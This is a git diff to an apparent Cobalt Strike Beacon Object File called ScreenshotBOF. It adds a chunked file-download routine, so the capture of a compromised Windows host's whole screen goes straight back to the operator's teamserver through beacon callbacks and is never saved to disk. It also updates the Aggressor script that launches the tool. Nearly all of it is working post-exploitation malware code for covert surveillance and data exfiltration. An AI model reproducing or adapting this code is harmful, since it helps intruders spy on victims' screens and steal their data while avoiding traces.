diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp index 7c3f08e..ad212e0 100644 --- a/ScreenshotBOF/Source.cpp +++ b/ScreenshotBOF/Source.cpp @@ -5,7 +5,138 @@ #pragma comment(lib, "User32.lib") #pragma comment(lib, "Gdi32.lib") +char downloadfilename[] = "screenshot.bmp"; +/*Download File*/ +void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { + //Intializes random number generator to create fileId + time_t t; + MSVCRT$srand((unsigned)MSVCRT$time(&t)); + int fileId = MSVCRT$rand(); + + //8 bytes for fileId and fileSize + int messageLength = downloadFileNameLength + 8; + char* packedData = (char*)MSVCRT$malloc(messageLength); + + //pack on fileId as 4-byte int first + packedData[0] = (fileId >> 24) & 0xFF; + packedData[1] = (fileId >> 16) & 0xFF; + packedData[2] = (fileId >> 8) & 0xFF; + packedData[3] = fileId & 0xFF; + + //pack on fileSize as 4-byte int second + packedData[4] = (fileSize >> 24) & 0xFF; + packedData[5] = (fileSize >> 16) & 0xFF; + packedData[6] = (fileSize >> 8) & 0xFF; + packedData[7] = fileSize & 0xFF; + + int packedIndex = 8; + + //pack on the file name last + for (int i = 0; i < downloadFileNameLength; i++) { + packedData[packedIndex] = fileName[i]; + packedIndex++; + } + + BeaconOutput(CALLBACK_FILE, packedData, messageLength); + + if (fileSize > (1024 * 900)) { + + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) + int numOfChunks = (fileSize / (1024 * 900)) + 1; + int index = 0; + int chunkSize = 1024 * 900; + + while (index < fileSize) { + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on + + /*First 4 are the fileId + then account for length of file + then a byte for the good-measure null byte to be included + then lastly is the 4-byte int of the fileSize*/ + int chunkLength = 4 + chunkSize; + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); + + //pack on fileId as 4-byte int first + packedChunk[0] = (fileId >> 24) & 0xFF; + packedChunk[1] = (fileId >> 16) & 0xFF; + packedChunk[2] = (fileId >> 8) & 0xFF; + packedChunk[3] = fileId & 0xFF; + + int chunkIndex = 4; + + //pack on the file name last + for (int i = index; i < index + chunkSize; i++) { + packedChunk[chunkIndex] = returnData[i]; + chunkIndex++; + } + + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); + + } + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements + + int lastChunkLength = fileSize - index + 4; + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); + + //pack on fileId as 4-byte int first + lastChunk[0] = (fileId >> 24) & 0xFF; + lastChunk[1] = (fileId >> 16) & 0xFF; + lastChunk[2] = (fileId >> 8) & 0xFF; + lastChunk[3] = fileId & 0xFF; + int lastChunkIndex = 4; + + //pack on the file name last + for (int i = index; i < fileSize; i++) { + lastChunk[lastChunkIndex] = returnData[i]; + lastChunkIndex++; + } + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); + } + + index = index + chunkSize; + + } + + } + else { + + /*first 4 are the fileId + then account for length of file + then a byte for the good-measure null byte to be included + then lastly is the 4-byte int of the fileSize*/ + int chunkLength = 4 + fileSize; + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); + + //pack on fileId as 4-byte int first + packedChunk[0] = (fileId >> 24) & 0xFF; + packedChunk[1] = (fileId >> 16) & 0xFF; + packedChunk[2] = (fileId >> 8) & 0xFF; + packedChunk[3] = fileId & 0xFF; + int chunkIndex = 4; + + //pack on the file name last + for (int i = 0; i < fileSize; i++) { + packedChunk[chunkIndex] = returnData[i]; + chunkIndex++; + } + + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); + } + + + //We need to tell the teamserver that we are done writing to this fileId + char packedClose[4]; + + //pack on fileId as 4-byte int first + packedClose[0] = (fileId >> 24) & 0xFF; + packedClose[1] = (fileId >> 16) & 0xFF; + packedClose[2] = (fileId >> 8) & 0xFF; + packedClose[3] = fileId & 0xFF; + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); + + return; +} #pragma region error_handling #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) @@ -80,11 +211,10 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) ReleaseDC(NULL, hDC); } - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); + //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); - if (fh == INVALID_HANDLE_VALUE) - return FALSE; + //if (fh == INVALID_HANDLE_VALUE) + // return FALSE; bmfHdr.bfType = 0x4D42; // "BM" dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; @@ -92,19 +222,28 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) bmfHdr.bfReserved1 = 0; bmfHdr.bfReserved2 = 0; bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); + + /* clean up */ GlobalUnlock(hDib); GlobalFree(hDib); - CloseHandle(fh); + //CloseHandle(fh); return TRUE; } #ifdef BOF void go(char* buff, int len) { - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); + datap parser; + char * downloadfilename; + BeaconDataParse(&parser, buff, len); + downloadfilename = BeaconDataExtract(&parser, NULL); + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); int x1, y1, x2, y2, w, h; // get screen dimensions x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); @@ -132,10 +271,10 @@ void go(char* buff, int len) { */ BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); - LPCSTR filename = "screenshot.bmp"; + LPCSTR filename = (LPCSTR)downloadfilename; SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); + //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename); // clean up SelectObject(hDC, old_obj); DeleteDC(hDC); diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h index e70bebc..bfcf21f 100644 --- a/ScreenshotBOF/beacon.h +++ b/ScreenshotBOF/beacon.h @@ -44,6 +44,9 @@ DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); #define CALLBACK_OUTPUT_OEM 0x1e #define CALLBACK_ERROR 0x0d #define CALLBACK_OUTPUT_UTF8 0x20 +#define CALLBACK_FILE 0x02 +#define CALLBACK_FILE_WRITE 0x08 +#define CALLBACK_FILE_CLOSE 0x09 DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h index c960e31..c0517b7 100644 --- a/ScreenshotBOF/bofdefs.h +++ b/ScreenshotBOF/bofdefs.h @@ -163,6 +163,7 @@ DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SI DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t); DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); @@ -266,6 +267,7 @@ DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBu #define HeapAlloc KERNEL32$HeapAlloc #define HeapReAlloc KERNEL32$HeapReAlloc #define memcpy MSVCRT$memcpy +#define malloc MSVCRT$malloc #define memset MSVCRT$memset diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log index a901931..dd08156 100644 --- a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log @@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once -C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc' C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj 1 File(s) copied enumerating sections... diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj index 372bf0d..93a36b3 100644 Binary files a/ScreenshotBOF/intermediary/BOF/x64/source.obj and b/ScreenshotBOF/intermediary/BOF/x64/source.obj differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log index 032e56b..4909ac5 100644 --- a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log @@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once -C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc' C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj 1 File(s) copied enumerating sections... diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj index e5c124d..247c80d 100644 Binary files a/ScreenshotBOF/intermediary/BOF/x86/source.obj and b/ScreenshotBOF/intermediary/BOF/x86/source.obj differ diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj index c252446..c069e07 100644 Binary files a/bin/BOF/ScreenshotBOF.x64.obj and b/bin/BOF/ScreenshotBOF.x64.obj differ diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj index 9619259..8b2d2fe 100644 Binary files a/bin/BOF/ScreenshotBOF.x86.obj and b/bin/BOF/ScreenshotBOF.x86.obj differ diff --git a/bin/BOF/screenshotBOF.cna b/bin/BOF/screenshotBOF.cna index 72d48df..3fcd237 100644 --- a/bin/BOF/screenshotBOF.cna +++ b/bin/BOF/screenshotBOF.cna @@ -11,11 +11,14 @@ alias screenshot_bof { # figure out the arch of this session $barch = barch($1); # read in the right BOF file - $handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj")); + $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj")); $data = readb($handle, -1); closef($handle); + + $args = bof_pack($1, "z",$2); + # announce what we're doing btask($1, "Running screenshot BOF by (@codex_tf2)"); # execute it. beacon_inline_execute($1, $data, "go", $args); -} \ No newline at end of file +} diff --git a/bin/screenshotBOF.zip b/bin/screenshotBOF.zip index 5f6b839..47aff69 100644 Binary files a/bin/screenshotBOF.zip and b/bin/screenshotBOF.zip differ